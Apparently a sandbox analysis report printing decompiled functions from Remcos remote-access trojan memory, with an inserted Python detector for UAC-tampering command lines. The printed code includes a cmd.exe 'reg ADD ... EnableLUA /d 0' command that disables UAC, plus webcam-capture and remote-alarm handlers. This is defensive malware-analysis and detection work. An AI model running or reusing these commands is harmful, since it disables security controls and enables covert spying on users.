                                                                      • Opcode ID: 8940971b1c16ecf5bb3cc059dd364852bd2c5ce80a721d2baeadbc68405bdab8
                                                                      • Instruction ID: f37217452082710b428347957efa3b3c77c82e31665ca5093cf55cce8ba34a86
                                                                      • Opcode Fuzzy Hash: 8940971b1c16ecf5bb3cc059dd364852bd2c5ce80a721d2baeadbc68405bdab8
                                                                      • Instruction Fuzzy Hash: 2D0125B5E00318AFDB00DFE5DC849EFBBBCFB44359F40092AF801A6250E7749A048AA5
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 100%
                                                                      			E0040D5E2() {
                                                                      				struct _PROCESS_INFORMATION _v20;
                                                                      				struct _STARTUPINFOA _v92;
                                                                      				void* __edi;
                                                                      				long _t18;
                                                                      
                                                                      				_t18 = 0x44;
                                                                      				E004337A0(0,  &_v92, 0, _t18);
                                                                      				_v92.cb = _t18;
                                                                      				E004337A0(0,  &_v20, 0, 0x10);
                                                                      				CreateProcessA("C:\\Windows\\System32\\cmd.exe", "/k %windir%\\System32\\reg.exe ADD HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System /v EnableLUA /t REG_DWORD /d 0 /f", 0, 0, 0, 0x8000000, 0, 0,  &_v92,  &_v20);
                                                                      				CloseHandle(_v20);
                                                                      				return CloseHandle(_v20.hThread);
                                                                      			}

                                                                      APIs
                                                                      • CreateProcessA.KERNEL32(C:\Windows\System32\cmd.exe,/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f,00000000,00000000,00000000,08000000,00000000,00000000,?,?,?,?,?,?,0046E600,0046E63C), ref: 0040D628
                                                                      • CloseHandle.KERNEL32(?,?,?,?,?,0046E600,0046E63C), ref: 0040D637
                                                                      • CloseHandle.KERNEL32(?,?,?,?,?,0046E600,0046E63C), ref: 0040D63C
                                                                      Strings
                                                                      • C:\Windows\System32\cmd.exe, xrefs: 0040D623
                                                                      • /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f, xrefs: 0040D61E
                                                                      Memory Dump Source
                                                                      • Source File: 00000011.00000002.645272430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_17_2_400000_InstallUtil.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: CloseHandle$CreateProcess
                                                                      • String ID: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f$C:\Windows\System32\cmd.exe
                                                                      • API String ID: 2922976086-4183131282
                                                                      • Opcode ID: e972bbdb19fc581a1521be6a6b84360bcaf573cf8652e10132a5f2755bce98e4
                                                                      • Instruction ID: f490e3e4e665ecb905acd3e2d8be5ab8d0c8e347414856c904d0006282b77b9b
                                                                      • Opcode Fuzzy Hash: e972bbdb19fc581a1521be6a6b84360bcaf573cf8652e10132a5f2755bce98e4
                                                                      • Instruction Fuzzy Hash: AEF096B6D002AC7ACB30ABE79C0DEDF7F7CEBC5B11F00046ABA04A6141D6745150C6B5
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%
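The command line that E0040D5E2 hands to cmd.exe is the kind of process-creation event a detection engineer would want to match. The matcher below is an added example for this report and is not Remcos code or Joe Sandbox output; it runs over constructed command lines (the first one is the string from the decompiled function above, the others are made up for the test). It goes beyond the page's EnableLUA case to the two sibling values under the same key that also weaken UAC when set to 0, ConsentPromptBehaviorAdmin and PromptOnSecureDesktop; that generalisation is the editor's, not the report's.

```python
"""Detect UAC-weakening 'reg ADD ...\\Policies\\System' command lines.

Added example, not part of the sandbox report.  Input is a plain command-line
string as it would appear in a process-creation log (Sysmon EID 1, 4688, EDR).
"""
import re
from typing import Optional

POLICY_KEY = r"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System"

# value name (lower-cased for matching) -> canonical spelling reported back.
# EnableLUA is the value the sample sets; the other two are the editor's addition.
WATCHED_VALUES = {
    "enablelua": "EnableLUA",
    "consentpromptbehavioradmin": "ConsentPromptBehaviorAdmin",
    "promptonsecuredesktop": "PromptOnSecureDesktop",
}

# 'reg ADD <key> ...' anywhere in the line; the key may be quoted.  \b before
# 'reg' also matches after a backslash, so '%windir%\System32\reg.exe' is found.
_REG_ADD = re.compile(r"\breg(?:\.exe)?\s+add\s+\"?([^\s\"]+)\"?(.*)$",
                      re.IGNORECASE | re.DOTALL)
_OPTION = re.compile(r"/(v|d|t)\s+\"?([^\s\"]+)", re.IGNORECASE)

# Constructed sample log lines.  [0] is the command line from E0040D5E2 above.
SAMPLE_CMDLINES = [
    r"C:\Windows\System32\cmd.exe /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f",
    r"reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 1 /f",
    r'reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v ConsentPromptBehaviorAdmin /t REG_DWORD /d 0 /f',
    r"reg.exe ADD HKCU\Software\ExampleVendor\ExampleApp /v EnableLUA /d 0 /f",
]


def parse_reg_add(cmdline: str) -> Optional[dict]:
    """Return {'key': <normalised key>, 'opts': {'v':..,'d':..,'t':..}} or None."""
    m = _REG_ADD.search(cmdline)
    if not m:
        return None
    key, rest = m.group(1), m.group(2)
    key = re.sub(r"^HKEY_LOCAL_MACHINE", "HKLM", key, flags=re.IGNORECASE)
    opts = {k.lower(): v for k, v in _OPTION.findall(rest)}
    return {"key": key.rstrip("\\"), "opts": opts}


def detect_uac_tamper(cmdline: str) -> Optional[dict]:
    """Flag a reg ADD that sets a watched UAC policy value to zero."""
    parsed = parse_reg_add(cmdline)
    if parsed is None or parsed["key"].lower() != POLICY_KEY.lower():
        return None
    value = parsed["opts"].get("v", "").lower()
    if value not in WATCHED_VALUES:
        return None
    try:
        data = int(parsed["opts"].get("d", ""), 0)   # accepts '0' and '0x0'
    except ValueError:
        return None                                  # missing or non-numeric /d
    if data != 0:
        return None
    return {"value": WATCHED_VALUES[value], "data": data, "cmdline": cmdline}


def scan(cmdlines) -> list:
    """Run the detector over an iterable of command lines and keep the hits."""
    return [hit for hit in map(detect_uac_tamper, cmdlines) if hit]


if __name__ == "__main__":
    for hit in scan(SAMPLE_CMDLINES):
        print(f"UAC tamper: {hit['value']}=0  <-  {hit['cmdline']}")
```

The matcher keys on the normalised registry path and the /v and /d options rather than on the literal string from the sample, so the same rule catches the HKEY_LOCAL_MACHINE spelling, a quoted key, and a bare `reg add` without the cmd.exe /k wrapper; anything under another hive or key is ignored.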

                                                                      C-Code - Quality: 87%
                                                                      			E004050BB(void* __ecx, void* __ebp, char _a4) {
                                                                      				// Stops the connection keep-alive: logs the event (unless _a4 is set),
                                                                      				// signals the worker via the event at +0x60 and waits for it to acknowledge.
                                                                      				void* _t17;
                                                                      				void* _t21;
                                                                      				void* _t22;
                                                                      				void* _t23;
                                                                      				void* _t25;
                                                                      				void* _t26;
                                                                      
                                                                      				_t23 = __ecx;
                                                                      				if( *((char*)(__ecx + 0x5c)) == 0) {           // keep-alive not active
                                                                      					return 0;
                                                                      				}
                                                                      				if(_a4 == 0) {
                                                                      					_t26 = _t25 - 0x18;
                                                                      					E00402053(_t17, _t25 - 0x18, _t21, __ebp, "Connection KeepAlive | Disabled");
                                                                      					E00402053(_t17, _t26 - 0x18, _t21, __ebp, "!");
                                                                      					E00417D02(_t17, _t22);                 // log writer; timestamps with GetLocalTime
                                                                      				}
                                                                      				 *(_t23 + 0x64) = CreateEventA(0, 0, 0, 0);   // auto-reset, initially unsignaled
                                                                      				SetEvent( *(_t23 + 0x60));                    // tell the keep-alive thread to stop
                                                                      				WaitForSingleObject( *(_t23 + 0x64), 0xffffffff);   // INFINITE: block until it acknowledges
                                                                      				CloseHandle( *(_t23 + 0x64));
                                                                      				return 1;
                                                                      			}

                                                                      Addresses: 0x004050bc 0x004050c2 0x00000000 0x00405121 0x004050c9 0x004050cb 0x004050d5 0x004050e4 0x004050e9 0x004050ee 0x00405100 0x00405103 0x0040510e 0x00405117 0x00000000

                                                                      APIs
                                                                      • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,0046E278,00404E51,00000001,?,00000000,0046E278,00404C7F,00000000,00000000,00000000,?), ref: 004050F7
                                                                      • SetEvent.KERNEL32(?,?,00000000,0046E278,00404C7F,00000000,00000000,00000000,?), ref: 00405103
                                                                      • WaitForSingleObject.KERNEL32(?,000000FF,?,00000000,0046E278,00404C7F,00000000,00000000,00000000,?), ref: 0040510E
                                                                      • CloseHandle.KERNEL32(?,?,00000000,0046E278,00404C7F,00000000,00000000,00000000,?), ref: 00405117
                                                                        • Part of subcall function 00417D02: GetLocalTime.KERNEL32(00000000), ref: 00417D1C
                                                                      Strings
                                                                      • Connection KeepAlive | Disabled, xrefs: 004050D0
                                                                      Memory Dump Source
                                                                      • Source File: 00000011.00000002.645272430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_17_2_400000_InstallUtil.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: Event$CloseCreateHandleLocalObjectSingleTimeWait
                                                                      • String ID: Connection KeepAlive | Disabled
                                                                      • API String ID: 2993684571-3818284553
                                                                      • Opcode ID: ccc04e33269f927f9319738c41aaa95ac72cc46b0163937b61128dff8ddc71d6
                                                                      • Instruction ID: 3daacff4e580f91c1f6f350cf8ed44886530e4b4853787aac4da69d9b787ca2e
                                                                      • Opcode Fuzzy Hash: ccc04e33269f927f9319738c41aaa95ac72cc46b0163937b61128dff8ddc71d6
                                                                      • Instruction Fuzzy Hash: D5F0F6718043107FDF1037759D0EA6B3E98AB02354F04056EF841956F2D57888D0DB5A
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 87%
                                                                      			E0041764D(WCHAR* __ecx) {
                                                                      				// "Alarm" command: logs "Alarm triggered!", then plays the sound file
                                                                      				// named by __ecx in a loop for 10 seconds and stops it.
                                                                      				void* __edi;
                                                                      				void* _t7;
                                                                      				void* _t11;
                                                                      				void* _t12;
                                                                      				WCHAR* _t14;
                                                                      				void* _t16;
                                                                      				void* _t17;
                                                                      				void* _t18;
                                                                      
                                                                      				_t18 = _t17 - 0x18;
                                                                      				_t14 = __ecx;
                                                                      				E00402053(_t7, _t17 - 0x18, _t11, _t16, "Alarm triggered");
                                                                      				E00402053(_t7, _t18 - 0x18, _t11, _t16, "!");
                                                                      				E00417D02(_t7, _t12);                          // log writer; timestamps with GetLocalTime
                                                                      				PlaySoundW(_t14, GetModuleHandleA(0), 0x20009);   // SND_FILENAME | SND_LOOP | SND_ASYNC
                                                                      				Sleep(0x2710);                                 // 10000 ms
                                                                      				return PlaySoundW(0, 0, 0);                    // NULL sound name stops playback
                                                                      			}

                                                                      Addresses: 0x0041764f 0x00417652 0x0041765b 0x0041766a 0x0041766f 0x0041768d 0x00417694 0x004176a1

                                                                      APIs
                                                                        • Part of subcall function 00417D02: GetLocalTime.KERNEL32(00000000), ref: 00417D1C
                                                                      • GetModuleHandleA.KERNEL32(00000000,00020009), ref: 0041767F
                                                                      • PlaySoundW.WINMM(00000000,00000000), ref: 0041768D
                                                                      • Sleep.KERNEL32(00002710), ref: 00417694
                                                                      • PlaySoundW.WINMM(00000000,00000000,00000000), ref: 0041769D
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000011.00000002.645272430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_17_2_400000_InstallUtil.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: PlaySound$HandleLocalModuleSleepTime
                                                                      • String ID: Alarm triggered
                                                                      • API String ID: 614609389-2816303416
                                                                      • Opcode ID: 9542b2003c5b813338b895ba0861b8ba11aa88615a0e2d5775900646b1513686
                                                                      • Instruction ID: 093683bbb276e0548a1b3f5a76380a34081b9d11d2653b5212bde0071ce3c36d
                                                                      • Opcode Fuzzy Hash: 9542b2003c5b813338b895ba0861b8ba11aa88615a0e2d5775900646b1513686
                                                                      • Instruction Fuzzy Hash: 5FE09222A04260379510337B7C0FD6F2D38CAC3BA570101AEFA04A6092DD58084286FB
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 96%
                                                                      			// CRT wcstombs-style helper: converts the wide string _a8 into the buffer _a4
                                                                      			// (at most _a12 bytes) using the locale in _a16; a NULL _a4 only computes the
                                                                      			// required length.  E00439941() returns the address of errno.
                                                                      			E0043A6FA(void* __ebx, void* __edx, void* __edi, void* __esi, char* _a4, short* _a8, int _a12, intOrPtr _a16) {
                                                                      				signed int _v8;
                                                                      				char _v16;
                                                                      				int _v20;
                                                                      				int _v24;
                                                                      				char* _v28;
                                                                      				int _v32;
                                                                      				char _v36;
                                                                      				intOrPtr _v44;
                                                                      				char _v48;
                                                                      				signed int _t59;
                                                                      				char* _t61;
                                                                      				intOrPtr _t63;
                                                                      				int _t64;
                                                                      				intOrPtr* _t65;
                                                                      				signed int _t68;
                                                                      				intOrPtr* _t71;
                                                                      				short* _t73;
                                                                      				int _t74;
                                                                      				int _t76;
                                                                      				char _t78;
                                                                      				short* _t83;
                                                                      				short _t85;
                                                                      				int _t91;
                                                                      				int _t93;
                                                                      				char* _t98;
                                                                      				int _t103;
                                                                      				char* _t105;
                                                                      				void* _t106;
                                                                      				intOrPtr _t108;
                                                                      				intOrPtr _t109;
                                                                      				int _t110;
                                                                      				short* _t113;
                                                                      				int _t114;
                                                                      				int _t116;
                                                                      				signed int _t117;
                                                                      
                                                                      				_t106 = __edx;
                                                                      				_t59 =  *0x46c00c; // 0xe1ce05e9
                                                                      				_v8 = _t59 ^ _t117;
                                                                      				_t61 = _a4;
                                                                      				_t91 = _a12;
                                                                      				_t116 = 0;
                                                                      				_v28 = _t61;
                                                                      				_v20 = 0;
                                                                      				_t113 = _a8;
                                                                      				_v24 = _t113;
                                                                      				if(_t61 == 0 || _t91 != 0) {
                                                                      					if(_t113 != 0) {
                                                                      						E004370F7(_t91,  &_v48, _t106, _a16);
                                                                      						_t98 = _v28;
                                                                      						if(_t98 == 0) {
                                                                      							_t63 = _v44;
                                                                      							if( *((intOrPtr*)(_t63 + 0xa8)) != _t116) {
                                                                      								_t64 = WideCharToMultiByte( *(_t63 + 8), _t116, _t113, 0xffffffff, _t116, _t116, _t116,  &_v20);
                                                                      								if(_t64 == 0 || _v20 != _t116) {
                                                                      									L55:
                                                                      									_t65 = E00439941();
                                                                      									_t114 = _t113 | 0xffffffff;
                                                                      									 *_t65 = 0x2a;                     // errno = EILSEQ (42): unconvertible character
                                                                      									goto L56;
                                                                      								} else {
                                                                      									_t53 = _t64 - 1; // -1
                                                                      									_t114 = _t53;
                                                                      									L56:
                                                                      									if(_v36 != 0) {
                                                                      										 *(_v48 + 0x350) =  *(_v48 + 0x350) & 0xfffffffd;
                                                                      									}
                                                                      									goto L59;
                                                                      								}
                                                                      							}
                                                                      							_t68 =  *_t113 & 0x0000ffff;
                                                                      							if(_t68 == 0) {
                                                                      								L51:
                                                                      								_t114 = _t116;
                                                                      								goto L56;
                                                                      							}
                                                                      							while(_t68 <= 0xff) {
                                                                      								_t113 =  &(_t113[1]);
                                                                      								_t116 = _t116 + 1;
                                                                      								_t68 =  *_t113 & 0x0000ffff;
                                                                      								if(_t68 != 0) {
                                                                      									continue;
                                                                      								}
                                                                      								goto L51;
                                                                      							}
                                                                      							goto L55;
                                                                      						}
                                                                      						_t108 = _v44;
                                                                      						if( *((intOrPtr*)(_t108 + 0xa8)) != _t116) {
                                                                      							if( *((intOrPtr*)(_t108 + 4)) != 1) {
                                                                      								_t114 = WideCharToMultiByte( *(_t108 + 8), _t116, _t113, 0xffffffff, _t98, _t91, _t116,  &_v20);
                                                                      								if(_t114 == 0) {
                                                                      									if(_v20 != _t116 || GetLastError() != 0x7a) {
                                                                      										L45:
                                                                      										_t71 = E00439941();
                                                                      										_t116 = _t116 | 0xffffffff;
                                                                      										 *_t71 = 0x2a;                     // errno = EILSEQ (42)
                                                                      										goto L51;
                                                                      									} else {
                                                                      										if(_t91 == 0) {
                                                                      											goto L56;
                                                                      										}
                                                                      										_t73 = _v24;
                                                                      										while(1) {
                                                                      											_t109 = _v44;
                                                                      											_t103 =  *(_t109 + 4);
                                                                      											if(_t103 > 5) {
                                                                      												_t103 = 5;
                                                                      											}
                                                                      											_t74 = WideCharToMultiByte( *(_t109 + 8), _t116, _t73, 1,  &_v16, _t103, _t116,  &_v20);
                                                                      											_t93 = _a12;
                                                                      											_t110 = _t74;
                                                                      											if(_t110 == 0 || _v20 != _t116 || _t110 < 0 || _t110 > 5) {
                                                                      												goto L55;
                                                                      											}
                                                                      											if(_t110 + _t114 > _t93) {
                                                                      												goto L56;
                                                                      											}
                                                                      											_t76 = _t116;
                                                                      											_v32 = _t76;
                                                                      											if(_t110 <= 0) {
                                                                      												L43:
                                                                      												_t73 = _v24 + 2;
                                                                      												_v24 = _t73;
                                                                      												if(_t114 < _t93) {
                                                                      													continue;
                                                                      												}
                                                                      												goto L56;
                                                                      											}
                                                                      											_t105 = _v28;
                                                                      											while(1) {
                                                                      												_t78 =  *((intOrPtr*)(_t117 + _t76 - 0xc));
                                                                      												 *((char*)(_t105 + _t114)) = _t78;
                                                                      												if(_t78 == 0) {
                                                                      													goto L56;
                                                                      												}
                                                                      												_t76 = _v32 + 1;
                                                                      												_t114 = _t114 + 1;
                                                                      												_v32 = _t76;
                                                                      												if(_t76 < _t110) {
                                                                      													continue;
                                                                      												}
                                                                      												goto L43;
                                                                      											}
                                                                      											goto L56;
                                                                      										}
                                                                      										goto L55;
                                                                      									}
                                                                      								}
                                                                      								if(_v20 != _t116) {
                                                                      									goto L45;
                                                                      								}
                                                                      								_t28 = _t114 - 1; // -1
                                                                      								_t116 = _t28;
                                                                      								goto L51;
                                                                      							}
                                                                      							if(_t91 == 0) {
                                                                      								L21:
                                                                      								_t116 = WideCharToMultiByte( *(_t108 + 8), _t116, _t113, _t91, _t98, _t91, _t116,  &_v20);
                                                                      								if(_t116 == 0 || _v20 != 0) {
                                                                      									goto L45;
                                                                      								} else {
                                                                      									if(_v28[_t116 - 1] == 0) {
                                                                      										_t116 = _t116 - 1;
                                                                      									}
                                                                      									goto L51;
                                                                      								}
                                                                      							}
                                                                      							_t83 = _t113;
                                                                      							_v24 = _t91;
                                                                      							while( *_t83 != _t116) {
                                                                      								_t83 =  &(_t83[1]);
                                                                      								_t16 =  &_v24;
                                                                      								 *_t16 = _v24 - 1;
                                                                      								if( *_t16 != 0) {
                                                                      									continue;
                                                                      								}
                                                                      								break;
                                                                      							}
                                                                      							if(_v24 != _t116 &&  *_t83 == _t116) {
                                                                      								_t91 = (_t83 - _t113 >> 1) + 1;
                                                                      							}
                                                                      							goto L21;
                                                                      						}
                                                                      						if(_t91 == 0) {
                                                                      							goto L51;
                                                                      						}
                                                                      						while( *_t113 <= 0xff) {
                                                                      							_t98[_t116] =  *_t113;
                                                                      							_t85 =  *_t113;
                                                                      							_t113 =  &(_t113[1]);
                                                                      							if(_t85 == 0) {
                                                                      								goto L51;
                                                                      							}
                                                                      							_t116 = _t116 + 1;
                                                                      							if(_t116 < _t91) {
                                                                      								continue;
                                                                      							}
                                                                      							goto L51;
                                                                      						}
                                                                      						goto L45;
                                                                      					}
                                                                      					 *((intOrPtr*)(E00439941())) = 0x16;
                                                                      					E0043862C();
                                                                      					goto L59;
                                                                      				} else {
                                                                      					L59:
                                                                      					return E004318FB(_v8 ^ _t117);
                                                                      				}
                                                                      			}
Instruction address column (per-line addresses of the listing above, extracted without their statements): 0x0043a6fa – 0x0043a97a

                                                                      Memory Dump Source
                                                                      • Source File: 00000011.00000002.645272430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_17_2_400000_InstallUtil.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 0e5e9f6e3dd4fc194e56f70beaac292661377ef14ebe3d1fc397c4a9d6b47518
                                                                      • Instruction ID: 49609b8c9c045d692caab616a8392ee6606f9b34eea959ce6d98c2d375fbb8f2
                                                                      • Opcode Fuzzy Hash: 0e5e9f6e3dd4fc194e56f70beaac292661377ef14ebe3d1fc397c4a9d6b47518
                                                                      • Instruction Fuzzy Hash: FA71067194021ADBCB21DF58C884BBFBB74EF59324F25662BE49077280C7788D51C79A
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 74%
                                                                      			E00404331(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __eflags, char** _a4, signed int _a8, intOrPtr _a12) {
                                                                      				char _v4;
                                                                      				void* _v36;
                                                                      				char _v40;
                                                                      				char _v48;
                                                                      				char _v52;
                                                                      				char _v56;
                                                                      				char _v72;
                                                                      				void* __esi;
                                                                      				void* _t24;
                                                                      				char** _t26;
                                                                      				intOrPtr* _t28;
                                                                      				char* _t36;
                                                                      				intOrPtr _t46;
                                                                      				signed int _t55;
                                                                      				signed int _t57;
                                                                      				char* _t60;
                                                                      				void* _t63;
                                                                      				signed int _t64;
                                                                      				void* _t66;
                                                                      				signed int _t75;
                                                                      				void* _t78;
                                                                      				void* _t127;
                                                                      				signed int _t129;
                                                                      				signed int _t131;
                                                                      				signed int _t133;
                                                                      				signed int _t134;
                                                                      				signed int _t135;
                                                                      				signed int _t136;
                                                                      				void* _t139;
                                                                      				signed int _t140;
                                                                      				char* _t142;
                                                                      				signed int _t144;
                                                                      				void* _t147;
                                                                      				void* _t148;
                                                                      				intOrPtr* _t149;
                                                                      
                                                                      				_push(__edi);
                                                                      				_t122 = _a8;
                                                                      				_t127 = __ecx;
                                                                      				_t24 = E0040276C(__ecx, _a8);
                                                                      				_t78 = _t127;
                                                                      				_t156 = _t24;
                                                                      				if(_t24 == 0) {
                                                                      					_push(__ebx);
                                                                      					E00402848(_t78, __edx, _t139, 0);
                                                                      					_t26 = E004021FD();
                                                                      					_t75 = _a8;
                                                                      					_a4 = _t26;
                                                                      					_t117 =  *_t26;
                                                                      					__eflags =  !_t117 - _t75;
                                                                      					if( !_t117 <= _t75) {
                                                                      						E00402864(_t127, _t139);
                                                                      						asm("int3");
                                                                      						_t140 = _t144;
                                                                      						_push(_t127);
                                                                      						_t28 = E00401F6B( &_v4);
                                                                      						E00404162( &_v4,  &_v40, 4, 0xffffffff);
                                                                      						_t147 = (_t144 & 0xfffffff8) - 0xc;
                                                                      						E004020B6(_t75, _t147, _t117, __eflags, 0x46e260);
                                                                      						_t148 = _t147 - 0x18;
                                                                      						E004020B6(_t75, _t148, _t117, __eflags,  &_v56);
                                                                      						E0041851D( &_v72, _t117);
                                                                      						_t149 = _t148 + 0x30;
                                                                      						_t129 =  *_t28 - 0x3c;
                                                                      						__eflags = _t129;
                                                                      						if(__eflags == 0) {
                                                                      							E00401E25( &_v48, _t117, _t140, __eflags, 0);
                                                                      							_t36 = E0040243C();
                                                                      							E00401F6B(E00401E25( &_v52, _t117, _t140, __eflags, 0));
                                                                      							_t117 = _t36;
                                                                      							_t131 = E0040F872();
                                                                      							__eflags = _t131;
                                                                      							if(_t131 != 0) {
                                                                      								 *0x46dac4 = E0040FAE7(_t131, "OpenCamera");
                                                                      								 *0x46dac0 = E0040FAE7(_t131, "CloseCamera");
                                                                      								_t46 = E0040FAE7(_t131, "GetFrame");
                                                                      								_t117 = "FreeFrame";
                                                                      								 *0x46dac8 = _t46;
                                                                      								 *0x46dabc = E0040FAE7(_t131, "FreeFrame");
                                                                      								 *0x46daaa = 1;
                                                                      								E004020B6(_t75, _t149 - 0x18, "FreeFrame", __eflags, 0x46e1c8);
                                                                      								_push(0x1b);
                                                                      								goto L23;
                                                                      							}
                                                                      						} else {
                                                                      							_t133 = _t129 - 1;
                                                                      							__eflags = _t133;
                                                                      							if(_t133 == 0) {
                                                                      								__eflags =  *0x46da77;
                                                                      								if(__eflags != 0) {
                                                                      									goto L20;
                                                                      								}
                                                                      							} else {
                                                                      								_t134 = _t133 - 1;
                                                                      								__eflags = _t134;
                                                                      								if(_t134 == 0) {
                                                                      									 *0x46dac0();
                                                                      									 *0x46da77 = 0;
                                                                      								} else {
                                                                      									_t135 = _t134 - 1;
                                                                      									__eflags = _t135;
                                                                      									if(_t135 == 0) {
                                                                      										_t55 =  *0x46dac4();
                                                                      										 *0x46da77 = _t55;
                                                                      										__eflags = _t55;
                                                                      										if(__eflags == 0) {
                                                                      											goto L15;
                                                                      										} else {
                                                                      											L20:
                                                                      											_t117 = E004383EC(_t50, E00401F6B(E00401E25( &_v48, _t117, _t140, __eflags, 0)));
                                                                      											E004045C7(_a8, _t52, __eflags);
                                                                      										}
                                                                      									} else {
                                                                      										_t136 = _t135 - 1;
                                                                      										__eflags = _t136;
                                                                      										if(_t136 == 0) {
                                                                      											_t57 =  *0x46dac4();
                                                                      											 *0x46da77 = _t57;
                                                                      											__eflags = _t57;
                                                                      											if(__eflags == 0) {
                                                                      												L15:
                                                                      												E004020B6(_t75, _t149 - 0x18, _t117, __eflags, 0x46e1c8);
                                                                      												_push(0x41);
                                                                      												L23:
                                                                      												E00404A78(_a8, _t117, __eflags);
                                                                      											} else {
                                                                      												_t60 = E004383EC(_t58, E00401F6B(E00401E25( &_v48, _t117, _t140, __eflags, _t136)));
                                                                      												 *_t149 = 0x3e8;
                                                                      												Sleep(??);
                                                                      												_t117 = _t60;
                                                                      												E004045C7(_a8, _t60, __eflags);
                                                                      												 *0x46dac0();
                                                                      											}
                                                                      										}
                                                                      									}
                                                                      								}
                                                                      							}
                                                                      						}
                                                                      						E00401E4D( &_v48, _t117);
                                                                      						E00401F98();
                                                                      						E00401F98();
                                                                      						__eflags = 0;
                                                                      						return 0;
                                                                      					} else {
                                                                      						_push(_t139);
                                                                      						_t142 =  &(_t117[_t75]);
                                                                      						__eflags = _t75;
                                                                      						if(_t75 != 0) {
                                                                      							_t64 = E004027A6(_t75, _t127, _t117, _t122, _t142, 0);
                                                                      							__eflags = _t64;
                                                                      							if(_t64 != 0) {
                                                                      								_t66 = E004021EA(_t127);
                                                                      								E00401586(E004021EA(_t127) + _t75 * 2, _t66,  *_a8);
                                                                      								E00401572(E004021EA(_t127), _t122, _t75);
                                                                      								E00402817(_t142);
                                                                      							}
                                                                      						}
                                                                      						_t63 = _t127;
                                                                      						goto L7;
                                                                      					}
                                                                      				} else {
                                                                      					_push(_a12);
                                                                      					_t63 = E004034A6(__ebx, _t127, __edx, _t122 - E004021EA(_t78) >> 1, _t127, _t139, _t156, _t78, _t127, _t122 - E004021EA(_t78) >> 1);
                                                                      					L7:
                                                                      					return _t63;
                                                                      				}
                                                                      			}

                                                                      APIs
                                                                        • Part of subcall function 00402864: std::_Xinvalid_argument.LIBCPMT ref: 00402869
                                                                      • Sleep.KERNEL32(00000000,0040B098), ref: 00404484
                                                                        • Part of subcall function 004045C7: __EH_prolog.LIBCMT ref: 004045CC
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000011.00000002.645272430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_17_2_400000_InstallUtil.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: H_prologSleepXinvalid_argumentstd::_
                                                                      • String ID: CloseCamera$FreeFrame$GetFrame$OpenCamera
                                                                      • API String ID: 834325642-3547787478
                                                                      • Opcode ID: c496853f038861f90756788e13719cdd24ac2683f914fefd35977560dbb8a89d
                                                                      • Instruction ID: 89c517a1881bf8512d00cff5985444bc52faea261af312299454f9d6a2ce3894
                                                                      • Opcode Fuzzy Hash: c496853f038861f90756788e13719cdd24ac2683f914fefd35977560dbb8a89d
                                                                      • Instruction Fuzzy Hash: 3F51E6B1F0820067CA14BB769C1AA6E36A55BC5718F04043FFA05B76D2EF7C8905869F
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 73%
                                                                      			E00440DBB(void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4) {
                                                                      				signed int _v8;
                                                                      				signed int _v12;
                                                                      				signed int _v16;
                                                                      				signed int _v36;
                                                                      				signed int _v40;
                                                                      				intOrPtr _v44;
                                                                      				signed int _v56;
                                                                      				char _v276;
                                                                      				short _v278;
                                                                      				short _v280;
                                                                      				char _v448;
                                                                      				signed int _v452;
                                                                      				signed int _v456;
                                                                      				short _v458;
                                                                      				intOrPtr _v460;
                                                                      				intOrPtr _v464;
                                                                      				signed int _v468;
                                                                      				signed int _v472;
                                                                      				intOrPtr _v508;
                                                                      				char _v536;
                                                                      				signed int _v540;
                                                                      				intOrPtr _v544;
                                                                      				signed int _v556;
                                                                      				char _v708;
                                                                      				signed int _v712;
                                                                      				signed int _v716;
                                                                      				short _v718;
                                                                      				signed int* _v720;
                                                                      				signed int _v724;
                                                                      				signed int _v728;
                                                                      				signed int _v732;
                                                                      				signed int* _v736;
